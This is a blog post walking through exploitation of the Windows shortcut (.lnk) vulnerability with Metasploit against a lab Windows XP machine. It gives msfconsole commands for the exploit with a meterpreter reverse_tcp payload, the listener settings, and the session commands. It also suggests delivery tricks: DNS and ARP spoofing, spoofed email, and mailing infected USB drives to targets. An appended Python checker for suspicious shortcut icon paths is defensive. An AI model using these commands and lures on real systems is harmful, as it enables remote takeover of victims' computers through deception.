A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability; that entry explains what the issue is and lists a few basic mitigation techniques.
Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.
Proof of concept testing:
This test was performed using my BT4 VM, which was assigned IP address 192.168.126.135, and a Windows XP SP3 VM using IP address 192.168.126.134.
Step 1: Load Metasploit and get latest update
On my BackTrack 4 VM, I browsed to /pentest/exploit/framework3 and launched msfconsole; once it has loaded, run svn update so you have the latest and greatest.
Step 2: Select your Exploit and Payload
msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options
The show options command lists the parameters that need to be set for the exploit to work; in our case that means the listening IP address and listening port.
Step 3: Fill-in required options and run exploit
At this stage you simply fill in the correct IP address and listening port for the machine you are launching the attack from. If these are wrong the victim machine will not know where to connect back to, since I selected the reverse_tcp payload.
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set SRVHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set LHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > exploit
Step 4: Get your victim to click the link or view the malicious file
Now at this stage you have to get a bit creative; here are a few things you can try:
- Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
- Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
- ARP spoof your host network and find a given target that’s using Facebook or one of many social networks and try to send them the link that way.
- Try a far-out social engineering attack, like purchasing several USB drives, injecting them, and mailing them to your target with the label “free USB drive”.
Once you have your targets in sight, just sit back and wait; once the exploit has fired you will see the output below:
Verify you have an active session with sessions -l, then connect to it with sessions -i #; from there you can run help to get a list of available commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it had been successfully exploited.
In the end there is not much the average user, who is not aware of everyday vulnerabilities, can do, but we as IT professionals need to be in the loop so that we can take the information back and make them aware. Lastly, the image in figure 6 should be a dead giveaway that something is up with your computer: if you didn’t connect to a share but suddenly see one pop up, it is time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback is welcome.
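As an added example that is not part of the original post, here is a small Python checker for the kind of artifact the share pop-up in figure 6 hints at: a shortcut whose icon is loaded from a network share. It reads the header and StringData fields of the Shell Link (.lnk) format as documented in [MS-SHLLINK] and flags an IconLocation that is a UNC path to a .dll or .cpl; the sample shortcut bytes it builds are constructed for the test, and the hypothetical is_suspicious heuristic does not decode the LinkTargetIDList, so a shortcut that carries its library path there would need that list decoded as well.

```python
import struct

# LinkFlags bits from the [MS-SHLLINK] header (uint32 at offset 20 of the 0x4C-byte header).
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and the StringData fields of a Shell Link file."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # LinkTargetIDList: uint16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    strings = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if flags & bit:                          # each string: uint16 char count, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return {"flags": flags, **strings}


def is_suspicious(info: dict) -> bool:
    """Heuristic (assumption): icon pulled from a UNC/WebDAV share and it is a library."""
    icon = info.get("icon_location", "").lower()
    return icon.startswith("\\\\") and icon.endswith((".dll", ".cpl"))


def build_sample(icon: str) -> bytes:
    """Construct a minimal .lnk carrying only an IconLocation string (test input)."""
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)                 # HeaderSize
    struct.pack_into("<I", header, 20, HAS_ICON | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")


if __name__ == "__main__":
    # Constructed samples: a remote library vs. a normal local icon source.
    for path in (r"\\192.0.2.10\share\icon.dll", r"%SystemRoot%\system32\shell32.dll"):
        info = parse_lnk(build_sample(path))
        print(path, "->", "SUSPICIOUS" if is_suspicious(info) else "ok")
```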